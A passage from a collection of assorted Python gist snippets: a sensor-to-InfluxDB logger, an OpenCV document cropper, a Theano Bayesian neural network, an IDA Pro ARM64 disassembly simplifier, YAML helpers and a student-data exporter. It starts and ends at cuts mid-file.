self._call_function()
def read_temperature(sensor, database):
temperature = sensor.temperature
if temperature is not None:
datum = TimeSeriesDatum("temp", temperature)
database.write(datum)
logging.info("temperature is {value:f} °C [{time!s}]".format(
value=datum.value, time=datum.time))
else:
logging.warning("could not convert temperature \"{value:s}\"".format(
value=temperature))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="read temperatures from a OneWire sensor")
parser.add_argument("device", type=str, help="device ID")
parser.add_argument("-I", "--influx", type=str, default="localhost",
help="InfluxDB hostname (default: %(default)s",
action=ServiceLocationAction),
parser.add_argument("-D", "--database", type=str, default=None,
help="InfluxDB database name"),
parser.add_argument("-H", "--host", type=str, default="localhost:4304",
help="owserver hostname (default: %(default)s)",
action=ServiceLocationAction),
parser.add_argument("-d", "--delay", type=int, default=1,
help="delay between sensor readings in seconds (default: %(default)d)")
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
database = InfluxDatabaseWriter(args.influx, args.database)
logging.info("connected to InfluxDB server at {hostname:s}:{port:d}".format(
hostname=args.influx.hostname, port=args.influx.port))
sensor = OneWireTemperatureSensor(args.host, args.device)
logging.info("connected to OneWire server at {hostname:s}:{port:d}".format(
hostname=args.host.hostname, port=args.host.port))
logging.info("found device {identifier:s} (type = {type:s})".format(
identifier=sensor.identifier, type=sensor.type))
Repeater(args.delay, read_temperature, sensor, database).start()
```
#### File: hard-gists/be7e84c9d61c4869e981/snippet.py
```python
import cv2
import sys
import numpy
from matplotlib import pyplot as plt
from scipy.spatial import distance
"""
OpenCV program to extract ticket stub images from photographs,
via automatic perspective correction for quadrilateral objects.
Intended for use prior to running through OCR.
Developed for the website http://stub.town by <NAME>
Based in large part on Python port of ScannerLite
https://gist.github.com/scturtle/9052852
original C++
https://github.com/daisygao/ScannerLite
Also incorporates ideas from:
http://opencv-code.com/tutorials/automatic-perspective-correction-for-quadrilateral-objects/
http://www.pyimagesearch.com/2015/04/06/zero-parameter-automatic-canny-edge-detection-with-python-and-opencv/
"""
class Line:
"""
A line object
"""
def __init__(self, l):
self.point = l
x1, y1, x2, y2 = l
self.c_x = (x1 + x2) / 2
self.c_y = (y1 + y2) / 2
def show(image):
"""
Show any image.
"""
msg = 'press any key to continue'
cv2.namedWindow(msg, cv2.WINDOW_NORMAL)
cv2.imshow(msg, image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def auto_canny(image, sigma=0.33):
"""
Get edges of an image
image: grayscale and blurred input image
edged: canny edge output image
"""
# compute the median of the single channel pixel intensities
v = numpy.median(image)
# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(image, lower, upper)
# return the edged image
return edged
def intersection(l1, l2):
"""
Compute intersect point of two lines l1 and l2
l1: line
l2: line
return: Intersect Point
"""
x1, y1, x2, y2 = l1.point
x3, y3, x4, y4 = l2.point
a1, b1 = y2 - y1, x1 - x2
c1 = a1 * x1 + b1 * y1
a2, b2 = y4 - y3, x3 - x4
c2 = a2 * x3 + b2 * y3
det = a1 * b2 - a2 * b1
assert det, "lines are parallel"
return (1. * (b2 * c1 - b1 * c2) / det, 1. * (a1 * c2 - a2 * c1) / det)
def scanCrop(image, debug=False):
"""
Do the whole scanning thing.
image: input image
return: output image, cropped and perspective corrected
"""
# resize input image to img_proc to reduce computation
h, w = image.shape[:2]
min_w = 300
scale = min(10., w * 1. / min_w)
h_proc = int(h * 1. / scale)
w_proc = int(w * 1. / scale)
image_dis = cv2.resize(image, (w_proc, h_proc))
if debug:
print(image.shape)
print(image_dis.shape)
# make grayscale
gray = cv2.cvtColor(image_dis, cv2.COLOR_BGR2GRAY)
# blur
gray = cv2.GaussianBlur(gray, (5,5), 0)
# get edges of the image
canny = auto_canny(gray)
if debug:
show(canny)
# extract lines from the edge image
# TODO: Seem good for given scale, but need more test images to confirm
threshold = 70
minLineLength = w_proc / 10
maxLineGap = w_proc / 30
lines = cv2.HoughLinesP(canny, 1, numpy.pi/180, threshold, None, minLineLength, maxLineGap)
if debug:
t = cv2.cvtColor(canny, cv2.COLOR_GRAY2BGR)
# classify lines into horizontal or vertical
hori, vert = [], []
for l in lines[0]:
x1, y1, x2, y2 = l
if abs(x1 - x2) > abs(y1 - y2):
hori.append(Line(l))
else:
vert.append(Line(l))
if debug:
cv2.line(t, (x1, y1), (x2, y2), (0, 0, 255), 1)
if debug:
show(t)
# edge cases when not enough lines are detected
# extend the known lines to the edge of the image to create a new line
if len(hori) < 2:
if not hori or hori[0].c_y > h_proc / 2:
hori.append(Line((0, 0, w_proc - 1, 0)))
if not hori or hori[0].c_y <= h_proc / 2:
hori.append(Line((0, h_proc - 1, w_proc - 1, h_proc - 1)))
if len(vert) < 2:
if not vert or vert[0].c_x > w_proc / 2:
vert.append(Line((0, 0, 0, h_proc - 1)))
if not vert or vert[0].c_x <= w_proc / 2:
vert.append(Line((w_proc - 1, 0, w_proc - 1, h_proc - 1)))
# sort lines according to their center point
hori.sort(key=lambda l: l.c_y)
vert.sort(key=lambda l: l.c_x)
# find corners
if debug:
# Visualize corners for debug only
for l in [hori[0], vert[0], hori[-1], vert[-1]]:
x1, y1, x2, y2 = l.point
cv2.line(t, (x1, y1), (x2, y2), (0, 255, 255), 1)
# corners for the small scale
image_points = [intersection(hori[0], vert[0]), intersection(hori[0], vert[-1]),
intersection(hori[-1], vert[0]), intersection(hori[-1], vert[-1])]
if debug:
print("image_points small", image_points)
# scale corners to the original size
for i, p in enumerate(image_points):
x, y = p
image_points[i] = (x * scale, y * scale)
if debug:
cv2.circle(t, (int(x), int(y)), 1, (255, 255, 0), 3)
if debug:
print("image_points large", image_points)
show(t)
# perspective transform
# Proportional to the original image:
# image_points[0] is Upper Left corner
# image_points[1] is Upper Right corner
# image_points[2] is Lower Left corner
# image_points[3] is Lower Right corner
top_width = distance.euclidean(image_points[0], image_points[1])
bottom_width = distance.euclidean(image_points[2], image_points[3])
# Average
output_width = int((top_width + bottom_width) / 2)
left_height = distance.euclidean(image_points[0], image_points[2])
right_height = distance.euclidean(image_points[1], image_points[3])
# Average
output_height = int((left_height + right_height) / 2)
if debug:
print(top_width, bottom_width, output_width)
print(left_height, right_height, output_height)
dst_pts = numpy.array(
((0, 0), (output_width - 1, 0), (0, output_height - 1), (output_width - 1, output_height - 1)),
numpy.float32)
image_points = numpy.array(image_points, numpy.float32)
transmtx = cv2.getPerspectiveTransform(image_points, dst_pts)
return cv2.warpPerspective(image, transmtx, (output_width, output_height))
if __name__ == '__main__':
"""
For testing
test.jpg: expect image in same folder as script, with rectangular object
test-crop.jpg: output cropped image; will overwrite if exists
"""
image = cv2.imread('test.jpg')
# If our test image needs to be rotated
image = numpy.rot90(image, 3)
show(image)
output_image = scanCrop(image, debug=True)
show(output_image)
cv2.imwrite('test-crop.jpg',output_image)
print("Saved.")
```
#### File: hard-gists/c12be33cdcd9a86f20a2/snippet.py
```python
from flask.ext.sqlalchemy import SQLAlchemy
def get_model(self, name):
return self.Model._decl_class_registry.get(name, None)
SQLAlchemy.get_model = get_model
def get_model_by_tablename(self, tablename):
for c in self.Model._decl_class_registry.values():
if hasattr(c, '__tablename__') and c.__tablename__ == tablename:
return c
SQLAlchemy.get_model_by_tablename = get_model_by_tablename
db = SQLAlchemy(app)
```
#### File: hard-gists/c344f114e1579a29e163/snippet.py
```python
from struct import unpack, iter_unpack
from collections import namedtuple
import os
def read_file_list(f, entry_num):
def decode(data, index):
for (n, item) in enumerate(data):
item = item[0]
item -= 39
item ^= 0xA5
item -= (27 + index + n)
yield item % 256
def to_str(data):
res_string = ''
for item in data:
if item >= 0x21 and item <= 0x7E:
res_string += '{:c}'.format(item)
return res_string
def to_int(data):
result = 0
data = list(data)[::-1]
for item in data:
result <<= 8
result += item
return result
result = []
last_offs, offs = 0, 0
Item = namedtuple('Item', 'name offset size')
for index in range(0, entry_num * 17, 17):
last_offs = offs
raw = list(decode(iter_unpack('B', f.read(17)), index))
name = to_str(raw[:13])
offs = to_int(raw[13:])
if index > 1:
pos = index // 17 - 1
result[pos] = Item(result[pos][0], result[pos][1], offs - last_offs)
result.append(Item(name, offs, 0))
result.pop()
return result
if __name__ == '__main__':
with open('data.fil', 'rb') as f:
num = unpack('i', f.read(4))[0] ^ 0x3BD7A59A
files = read_file_list(f, num)
for file in files:
# if not os.path.exists('export'):
# os.makedirs('export')
with open('{}'.format(file.name), 'wb') as w:
f.seek(file.offset)
w.write(f.read(file.size))
```
#### File: hard-gists/c591cab03c66780b18d5/snippet.py
```python
from __future__ import print_function
# Storage area for missing figures
FIGSTORE = '/home/fperez/talks/slides/fig'
# Module imports
import logging
import os
import shutil
import sys
from bs4 import BeautifulSoup
import requests
from IPython.config.loader import Config
from IPython.config.application import catch_config_error
from IPython.utils.traitlets import Unicode
from IPython.nbconvert.nbconvertapp import NbConvertApp
from IPython.nbconvert.nbconvertapp import nbconvert_aliases, nbconvert_flags
from IPython.nbconvert.writers import WriterBase
# Main code
class LinkCheckWriter(WriterBase):
def copy_image(self, src, dst):
"""Copy src to dst, attempting to hard-link first. """
log = self.log
try:
os.link(src, dst)
except OSError:
try:
shutil.copy(src, dst)
except Exception:
log.error("Image copy failed: %s" % sys.exc_info()[0])
else:
log.warn("Successfully created missing image.")
def verify_images(self, soup):
"""Verify all image references in a BeautifulSoup HTML object.
Parameters
----------
soup : BeautifulSoup object built from an HTML source.
"""
log = self.log
for i, img in enumerate(soup.find_all('img')):
src = img.get('src')
if src.startswith('data:image'):
log.info('Image %s has embedded data.' % i)
return
if os.path.exists(src):
log.info("Image #%s OK: %s" % (i, src))
else:
log.warn("Image #%s missing: %s" % (i, src))
fname = os.path.split(src)[-1]
target_source = os.path.join(FIGSTORE, fname)
if os.path.exists(target_source):
log.warn('Available at: %s' % FIGSTORE)
self.copy_image(target_source, src)
def verify_http_link(self, i, href):
log = self.log
try:
r = requests.get(href)
except requests.ConnectionError:
log.warn("Link #%s Conection Error: %s" % (i, href))
except:
log.error("Link #%s error: %s, %s" % (i, href,
sys.exc_info[0]))
else:
stat = r.status_code
if stat == requests.codes.ok:
log.info("Link #%s OK (%s): %s " % (i, stat, href))
else:
log.warn("Link #%s problem (%s): %s " % (i, stat, href))
def verify_links(self, soup):
"""Verify all links in a BeautifulSoup HTML object.
Parameters
----------
soup : BeautifulSoup object built from an HTML source.
"""
log = self.log
# Nothing implemented on links yet, just log them
for (i, lnk) in enumerate(soup.find_all('a')):
href = lnk.get('href')
if href is None:
log.warn("Malformed link: %s" % lnk)
continue
if href.startswith('http'):
self.verify_http_link(i, href)
elif href.startswith('#'):
log.info("Internal anchor link: %s" % href)
continue
else:
if os.path.exists(href):
log.info("Local valid link: %s" % href)
else:
log.warn("Unkown link: %s" % href)
def write(self, output, resources, **kw):
notebook_uri = resources['unique_key']
self.log.warn('-'*40)
self.log.warn('Checking notebook: %s' % notebook_uri)
soup = BeautifulSoup(output, "html.parser")
self.verify_links(soup)
self.verify_images(soup)
class LinkCheckApp(NbConvertApp):
name = Unicode(u'nblinkcheck')
description = Unicode(u'Check image links in a notebook.')
examples = """
To check all image links in all notebooks in the current directory:
./nblinkcheck *ipynb
"""
def _export_format_default(self):
return 'html'
def build_extra_config(self):
self.extra_config = Config()
self.extra_config.Exporter.preprocessors = [
]
self.config.merge(self.extra_config)
@catch_config_error
def initialize(self, argv=None):
# Meant to be used as a command-line app, so only log at a higher level
self.log.level = logging.WARN
super(LinkCheckApp,self).initialize(argv)
self.build_extra_config()
self.writer = LinkCheckWriter(parent=self)
if __name__ == '__main__':
LinkCheckApp.launch_instance()
```
#### File: hard-gists/c5af642cf217971d93f499e8f70fcb72/snippet.py
```python
import theano
import theano.tensor as T
from theano.tensor.shared_randomstreams import RandomStreams
from theano.sandbox.rng_mrg import MRG_RandomStreams
from lasagne.updates import adam
from lasagne.utils import collect_shared_vars
from sklearn.datasets import fetch_mldata
from sklearn.cross_validation import train_test_split
from sklearn import preprocessing
import numpy as np
rnd = RandomStreams(seed=123)
gpu_rnd = MRG_RandomStreams(seed=123)
def nonlinearity(x):
return T.nnet.relu(x)
def log_gaussian(x, mu, sigma):
return -0.5 * np.log(2 * np.pi) - T.log(T.abs_(sigma)) - (x - mu) ** 2 / (2 * sigma ** 2)
def log_gaussian_logsigma(x, mu, logsigma):
return -0.5 * np.log(2 * np.pi) - logsigma / 2. - (x - mu) ** 2 / (2. * T.exp(logsigma))
def _shared_dataset(data_xy, borrow=True):
data_x, data_y = data_xy
shared_x = theano.shared(np.asarray(data_x, dtype=theano.config.floatX), borrow=borrow)
shared_y = theano.shared(np.asarray(data_y, dtype=theano.config.floatX), borrow=borrow)
return shared_x, shared_y
def init(shape):
return np.asarray(
np.random.normal(0, 0.05, size=shape),
dtype=theano.config.floatX
)
def get_random(shape, avg, std):
return gpu_rnd.normal(shape, avg=avg, std=std)
if __name__ == '__main__':
mnist = fetch_mldata('MNIST original')
# prepare data
N = 5000
data = np.float32(mnist.data[:]) / 255.
idx = np.random.choice(data.shape[0], N)
data = data[idx]
target = np.int32(mnist.target[idx]).reshape(N, 1)
train_idx, test_idx = train_test_split(np.array(range(N)), test_size=0.05)
train_data, test_data = data[train_idx], data[test_idx]
train_target, test_target = target[train_idx], target[test_idx]
train_target = np.float32(preprocessing.OneHotEncoder(sparse=False).fit_transform(train_target))
# inputs
x = T.matrix('x')
y = T.matrix('y')
n_input = train_data.shape[1]
M = train_data.shape[0]
sigma_prior = T.exp(-3)
n_samples = 3
learning_rate = 0.001
n_epochs = 100
# weights
# L1
n_hidden_1 = 200
W1_mu = theano.shared(value=init((n_input, n_hidden_1)))
W1_logsigma = theano.shared(value=init((n_input, n_hidden_1)))
b1_mu = theano.shared(value=init((n_hidden_1,)))
b1_logsigma = theano.shared(value=init((n_hidden_1,)))
# L2
n_hidden_2 = 200
W2_mu = theano.shared(value=init((n_hidden_1, n_hidden_2)))
W2_logsigma = theano.shared(value=init((n_hidden_1, n_hidden_2)))
b2_mu = theano.shared(value=init((n_hidden_2,)))
b2_logsigma = theano.shared(value=init((n_hidden_2,)))
# L3
n_output = 10
W3_mu = theano.shared(value=init((n_hidden_2, n_output)))
W3_logsigma = theano.shared(value=init((n_hidden_2, n_output)))
b3_mu = theano.shared(value=init((n_output,)))
b3_logsigma = theano.shared(value=init((n_output,)))
all_params = [
W1_mu, W1_logsigma, b1_mu, b1_logsigma,
W2_mu, W2_logsigma, b2_mu, b2_logsigma,
W3_mu, W3_logsigma, b3_mu, b3_logsigma
]
all_params = collect_shared_vars(all_params)
# building the objective
# remember, we're evaluating by samples
log_pw, log_qw, log_likelihood = 0., 0., 0.
for _ in xrange(n_samples):
epsilon_w1 = get_random((n_input, n_hidden_1), avg=0., std=sigma_prior)
epsilon_b1 = get_random((n_hidden_1,), avg=0., std=sigma_prior)
W1 = W1_mu + T.log(1. + T.exp(W1_logsigma)) * epsilon_w1
b1 = b1_mu + T.log(1. + T.exp(b1_logsigma)) * epsilon_b1
epsilon_w2 = get_random((n_hidden_1, n_hidden_2), avg=0., std=sigma_prior)
epsilon_b2 = get_random((n_hidden_2,), avg=0., std=sigma_prior)
W2 = W2_mu + T.log(1. + T.exp(W2_logsigma)) * epsilon_w2
b2 = b2_mu + T.log(1. + T.exp(b2_logsigma)) * epsilon_b2
epsilon_w3 = get_random((n_hidden_2, n_output), avg=0., std=sigma_prior)
epsilon_b3 = get_random((n_output,), avg=0., std=sigma_prior)
W3 = W3_mu + T.log(1. + T.exp(W3_logsigma)) * epsilon_w3
b3 = b3_mu + T.log(1. + T.exp(b3_logsigma)) * epsilon_b3
a1 = nonlinearity(T.dot(x, W1) + b1)
a2 = nonlinearity(T.dot(a1, W2) + b2)
h = T.nnet.softmax(nonlinearity(T.dot(a2, W3) + b3))
sample_log_pw, sample_log_qw, sample_log_likelihood = 0., 0., 0.
for W, b, W_mu, W_logsigma, b_mu, b_logsigma in [(W1, b1, W1_mu, W1_logsigma, b1_mu, b1_logsigma),
(W2, b2, W2_mu, W2_logsigma, b2_mu, b2_logsigma),
(W3, b3, W3_mu, W3_logsigma, b3_mu, b3_logsigma)]:
# first weight prior
sample_log_pw += log_gaussian(W, 0., sigma_prior).sum()
sample_log_pw += log_gaussian(b, 0., sigma_prior).sum()
# then approximation
sample_log_qw += log_gaussian_logsigma(W, W_mu, W_logsigma * 2).sum()
sample_log_qw += log_gaussian_logsigma(b, b_mu, b_logsigma * 2).sum()
# then the likelihood
sample_log_likelihood = log_gaussian(y, h, sigma_prior).sum()
log_pw += sample_log_pw
log_qw += sample_log_qw
log_likelihood += sample_log_likelihood
log_qw /= n_samples
log_pw /= n_samples
log_likelihood /= n_samples
batch_size = 100
n_batches = M / float(batch_size)
objective = ((1. / n_batches) * (log_qw - log_pw) - log_likelihood).sum() / float(batch_size)
# updates
updates = adam(objective, all_params, learning_rate=learning_rate)
i = T.iscalar()
train_data = theano.shared(np.asarray(train_data, dtype=theano.config.floatX))
train_target = theano.shared(np.asarray(train_target, dtype=theano.config.floatX))
train_function = theano.function(
inputs=[i],
outputs=objective,
updates=updates,
givens={
x: train_data[i * batch_size: (i + 1) * batch_size],
y: train_target[i * batch_size: (i + 1) * batch_size]
}
)
a1_mu = nonlinearity(T.dot(x, W1_mu) + b1_mu)
a2_mu = nonlinearity(T.dot(a1_mu, W2_mu) + b2_mu)
h_mu = T.nnet.softmax(nonlinearity(T.dot(a2_mu, W3_mu) + b3_mu))
output_function = theano.function([x], T.argmax(h_mu, axis=1))
n_train_batches = int(train_data.get_value().shape[0] / float(batch_size))
# and finally, training loop
for e in xrange(n_epochs):
errs = []
for b in xrange(n_train_batches):
batch_err = train_function(b)
errs.append(batch_err)
out = output_function(test_data)
acc = np.count_nonzero(output_function(test_data) == np.int32(test_target.ravel())) / float(test_data.shape[0])
print 'epoch', e, 'cost', np.mean(errs), 'Accuracy', acc
```
#### File: hard-gists/c6936d219db8e6635d25/snippet.py
```python
import idaapi
import idc
ARM64_MOVE_I = idaapi.ARM_mov
def dump_cmd(cmd):
print "cs = %lx" % cmd.cs
print "ip = %lx" % cmd.ip
print "ea = %lx" % cmd.ea
print "itype = %lx" % cmd.itype
print "size = %lx" % cmd.size
print "auxpref = %lx" % cmd.auxpref
print "segpref = %lx" % cmd.segpref
print "insnpref = %lx" % cmd.insnpref
print "flags = %lx" % cmd.flags
def dump_op(op):
print "n = %lx" % op.n
print "type = %lx" % op.type
print "offb = %lx" % op.offb
print "offo = %lx" % op.offo
print "flags = %lx" % op.flags
print "dtyp = %lx" % op.dtyp
print "reg = %lx" % op.reg
print "phrase = %lx" % op.phrase
print "value = %lx" % op.value
print "addr = %lx" % op.addr
print "specval = %lx" % op.specval
print "specflag1 = %lx" % op.specflag1
print "specflag2 = %lx" % op.specflag2
print "specflag3 = %lx" % op.specflag3
print "specflag4 = %lx" % op.specflag4
def HighestSetBit(N, imm):
i = N - 1
while i >= 0:
if imm & (1 << i):
return i
i -= 1
return -1
def ZeroExtendOnes(M, N): # zero extend M ones to N width
return (1 << M) - 1
def RORZeroExtendOnes(M, N, R):
val = ZeroExtendOnes(M, N)
return ((val >> R) & ((1 << (N - R)) - 1)) | ((val & ((1 << R) - 1)) << (N - R))
def Replicate(val, bits):
ret = val
shift = bits
while shift < 64: # XXX actually, it is either 32 or 64
ret |= (val << shift)
shift += bits
return ret
def DecodeBitMasks(immN, imms, immr, immediate):
len = HighestSetBit(7, (immN << 6) | (~imms & 0x3F))
if len < 1:
return None
levels = ZeroExtendOnes(len, 6)
if immediate and (imms & levels) == levels:
return None
S = imms & levels
R = immr & levels
esize = 1 << len
return Replicate(RORZeroExtendOnes(S + 1, esize, R), esize)
def DecodeMov(opcode, total, first):
# opc
o = (opcode >> 29) & 3
# constant
k = (opcode >> 23) & 0x3F
if k == 0x24 and o == 1: # MOV (bitmask imm) <=> ORR (immediate)
# sf
s = (opcode >> 31) & 1
# N
N = (opcode >> 22) & 1
if s == 0 and N != 0:
return None
# rn
rn = (opcode >> 5) & 0x1F
if rn == 31:
imms = (opcode >> 10) & 0x3F
immr = (opcode >> 16) & 0x3F
return DecodeBitMasks(N, imms, immr, True)
elif k == 0x25: # MOVN/MOVZ/MOVK
# sf
s = (opcode >> 31) & 1
# hw
h = (opcode >> 21) & 3
# imm16
i = (opcode >> 5) & 0xFFFF
if s == 0 and h > 1:
return None
h *= 16
i <<= h
if o == 0: # MOVN
return ~i
elif o == 2: # MOVZ
return i
elif o == 3 and not first: # MOVK
return (total & ~(0xFFFF << h)) | i
elif (k | 1) == 0x23 and not first: # ADD (immediate)
# shift
h = (opcode >> 22) & 3
if h > 1:
return None
# rn
rd = opcode & 0x1F
rn = (opcode >> 5) & 0x1F
if rd != rn:
return None
# imm12
i = (opcode >> 10) & 0xFFF
h *= 12
i <<= h
if o & 2: # SUB
return total - i
else: # ADD
return total + i
return None
def check_mov_sequence(ea):
oldea = ea
reg = -1
total = 0
is64 = False
while idaapi.getseg(ea).use64():
d = idaapi.get_long(ea)
# reg
r = d & 0x1F
if reg >= 0 and reg != r:
break
newval = DecodeMov(d, total, reg < 0)
if newval is None:
break
if reg >= 0 and idaapi.get_first_fcref_to(ea) != idaapi.BADADDR:
break
if (d >> 31) & 1:
is64 = True
total = newval
reg = r
ea += 4
return ea - oldea, reg, is64, total
def is_my_mov(cmd):
if cmd.itype == ARM64_MOVE_I and cmd.flags == idaapi.INSN_MACRO and cmd.size > 4:
return True
return False
def check_ubfm_shift(ea):
if idaapi.getseg(ea).use64():
opcode = idaapi.get_long(ea)
# opc
o = (opcode >> 29) & 3
# constant
k = (opcode >> 23) & 0x3F
if (o & 1) == 0 and k == 0x26:
# sf
s = (opcode >> 31) & 1
# N
N = (opcode >> 22) & 1
if s == N:
# imm
imms = (opcode >> 10) & 0x3F
immr = (opcode >> 16) & 0x3F
mask = 0x1F | ((s & N) << 5)
if imms == mask:
return idaapi.ARM_lsr if o else idaapi.ARM_asr, opcode, s, immr
elif immr == imms + 1:
return idaapi.ARM_lsl if o else idaapi.ARM_null, opcode, s, mask - imms
return idaapi.ARM_null, 0, 0, 0
class simpA64Hook(idaapi.IDP_Hooks):
def __init__(self):
idaapi.IDP_Hooks.__init__(self)
self.n = idaapi.netnode("$ A64 Simplifier",0,1)
def custom_ana(self):
len, reg, is64, imm = check_mov_sequence(idaapi.cmd.ea)
if len > 4:
#print "0x%x: MOV/MOVK %c%d, #0x%x" % (idaapi.cmd.ea, 'X' if is64 else 'W', reg, imm)
#dump_cmd(idaapi.cmd)
#dump_op(idaapi.cmd.Op1)
#dump_op(idaapi.cmd.Op2)
idaapi.cmd.itype = ARM64_MOVE_I
idaapi.cmd.segpref = 14 # ARM Condition = ALways
idaapi.cmd.Op1.type = idaapi.o_reg
idaapi.cmd.Op1.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op1.reg = reg + 129 # Use Wn/Xn registers instead of Rn
idaapi.cmd.Op2.type = idaapi.o_imm
idaapi.cmd.Op2.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op2.value = imm
idaapi.cmd.flags = idaapi.INSN_MACRO
idaapi.cmd.size = len
return True
insn, regs, is64, shift = check_ubfm_shift(idaapi.cmd.ea)
if insn != idaapi.ARM_null:
idaapi.cmd.itype = insn
idaapi.cmd.segpref = 14
idaapi.cmd.Op1.type = idaapi.o_reg
idaapi.cmd.Op1.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op1.reg = (regs & 0x1F) + 129
idaapi.cmd.Op2.type = idaapi.o_reg
idaapi.cmd.Op2.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op2.reg = ((regs >> 5) & 0x1F) + 129
idaapi.cmd.Op3.type = idaapi.o_imm
idaapi.cmd.Op3.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op3.value = shift
idaapi.cmd.size = 4
return True
return False
def custom_mnem(self): # totally optional
if is_my_mov(idaapi.cmd):
return "MOVE"
return None
# def custom_out(self): # XXX ida would just append .EQ
# if is_my_mov(idaapi.cmd):
# buf = idaapi.init_output_buffer(1024)
# idaapi.OutMnem(16, "")
# idaapi.out_one_operand(0)
# idaapi.out_symbol(',')
# idaapi.OutChar(' ')
# idaapi.out_one_operand(1)
# idaapi.term_output_buffer()
# idaapi.MakeLine(buf)
# return True
# return False
# def custom_outop(self, op): # XXX ida would just use Rn
# if is_my_mov(idaapi.cmd) and op.type == idaapi.o_reg:
# idaapi.out_register("%c%d" % ('X' if op.dtyp == idaapi.dt_qword else 'W', op.reg))
# return True
# return False
class simpa64_t(idaapi.plugin_t):
flags = idaapi.PLUGIN_PROC
comment = "Simplifier"
wanted_hotkey = "Alt-Z"
help = "Runs transparently"
wanted_name = "simpa64"
hook = None
enabled = 1
def init(self):
self.hook = None
if idaapi.ph_get_id() != idaapi.PLFM_ARM or idaapi.BADADDR <= 0xFFFFFFFF:
return idaapi.PLUGIN_SKIP
self.hook = simpA64Hook()
flag = self.hook.n.altval(0)
if flag:
self.enabled = flag - 1
print "%s is %sabled" % (self.wanted_name, "en" if self.enabled else "dis")
if self.enabled:
self.hook.hook()
return idaapi.PLUGIN_KEEP
def run(self, arg):
print "%sabling %s" % ("dis" if self.enabled else "en", self.wanted_name)
if self.enabled:
self.hook.unhook()
else:
self.hook.hook()
self.enabled = self.enabled ^ 1
self.hook.n.altset(0, self.enabled + 1)
idc.Refresh()
def term(self):
if self.hook:
self.hook.unhook()
def PLUGIN_ENTRY():
return simpa64_t()
```
#### File: hard-gists/c70fb69eef42d40bed06/snippet.py
```python
try:
# for python newer than 2.7
from collections import OrderedDict
except ImportError:
# use backport from pypi
from ordereddict import OrderedDict
import yaml
# try to use LibYAML bindings if possible
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from yaml.representer import SafeRepresenter
_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG
def dict_representer(dumper, data):
return dumper.represent_dict(data.iteritems())
def dict_constructor(loader, node):
return OrderedDict(loader.construct_pairs(node))
Dumper.add_representer(OrderedDict, dict_representer)
Loader.add_constructor(_mapping_tag, dict_constructor)
Dumper.add_representer(str,
SafeRepresenter.represent_str)
Dumper.add_representer(unicode,
SafeRepresenter.represent_unicode)
# output = yaml.dump(data, Dumper=Dumper, default_flow_style=False)
# data = yaml.load(stream, Loader=Loader)
# abc:
# x:
# 0: null
# y:
# 1: null
yml_dict = OrderedDict(
abc=OrderedDict(
[('x', OrderedDict([(0, None)])), ('y', OrderedDict([(1, None)]))]))
import json
print(json.dumps(yml_dict, indent=2))
print
# dump ordereddict to yaml
output = yaml.dump(yml_dict, Dumper=Dumper, default_flow_style=False)
print output
# directly write to a file object to save memory.
with open('result.yml', 'w') as f:
yaml.dump(yml_dict, f, default_flow_style=False)
```
#### File: hard-gists/c7a2333c227e24226808/snippet.py
```python
from pylab import *
from scipy.stats import norm, uniform
theta_grid = arange(0,2*pi,1.0/1024.0)
true_b = pi/2
b_belief = ones(shape=theta_grid.shape, dtype=float)
b_belief /= b_belief.sum()
def _radian_normalize(x):
new_x = x.copy()
new_x[where(new_x > 2*pi)] -= 2*pi
new_x[where(new_x < 0)] += 2*pi
return new_x
Nt = 25
t = arange(0,Nt)
true_directions = _radian_normalize(norm(pi/2,pi/4).rvs(Nt-1))
measured_directions = _radian_normalize(true_directions + true_b)
positions = zeros(shape=(2, Nt))
positions[:,1:] = array([ cumsum(cos(true_directions)), cumsum(sin(true_directions)) ])
position_noise = 0.25
measured_positions = positions + norm(0,position_noise).rvs( (2, Nt) )
measured_deltas = measured_positions[:,1:]-measured_positions[:,0:-1]
plot(theta_grid, b_belief, label='prior')
def update_belief(delta_pos, measured_dir, prior):
print "delta_pos = " + str(delta_pos)
print "measured dir = " + str(measured_dir - true_b)
dist = norm(0, 2*position_noise)
posterior = dist.pdf(delta_pos[0] - cos(measured_dir - theta_grid)) * dist.pdf(delta_pos[1] - sin(measured_dir - theta_grid))
posterior *= prior
posterior /= posterior.sum()
return posterior
for i in range(21):
b_belief = update_belief(measured_deltas[:,i], measured_directions[i], b_belief)
if (i % 4 == 0):
plot(theta_grid, b_belief, label='measurement ' + str(i))
legend()
xticks([0, pi/2, pi, 3*pi/2, 2*pi], ['0', 'pi/2', 'pi', '3pi/2', '2pi'])
#axis('equal')
#plot(positions[0], positions[1], 'bo', label='positions')
#plot(measured_positions[0], measured_positions[1], 'go', label='measured positions')
show()
```
#### File: hard-gists/cb2b90523c592abe7ae4/snippet.py
```python
from sqlalchemy import *
from sqlalchemy.sql import select
from ps_db_utils import *
import csv
import os
import shutil
from datetime import *
class StudentData(object):
def __init__(self):
self.fields_for_moodle = [
'id',
'dcid',
'my_custom_field1',
'student_number',
'first_name',
'last_name',
'city',
'schoolid',
'grade_level',
'graduation_year',
'my_custom_field2',
]
self.minimum_grade_level = 2
self.maximum_grade_level = 99
self.db = PsDB()
self.table = self.db.reverse_table("students")
self.table_fields = self.table.c.keys()
self.custom_fields = None
self.custom_fields_table = None
if "u_studentsuserfields" not in self.db.meta.tables.keys():
self.custom_fields_table = Table("u_studentsuserfields", self.db.meta,
Column('studentsdcid', String(50), primary_key=True),
Column('studentsdcid', Integer, ForeignKey("students.dcid"), primary_key=True),
autoload=True)
else:
self.custom_fields_table = self.db.meta.tables["u_studentsuserfields"]
if self.custom_fields_table != None:
self.custom_fields = self.custom_fields_table.c.keys()
def get_field(main_row, custom_row, student_data, field_name):
if field_name in student_data.table_fields:
return main_row.__dict__[field_name]
elif field_name in student_data.custom_fields:
return custom_row.__dict__[field_name]
return None
def valid_student(row, student_data):
enrolled = False
valid_grade = False
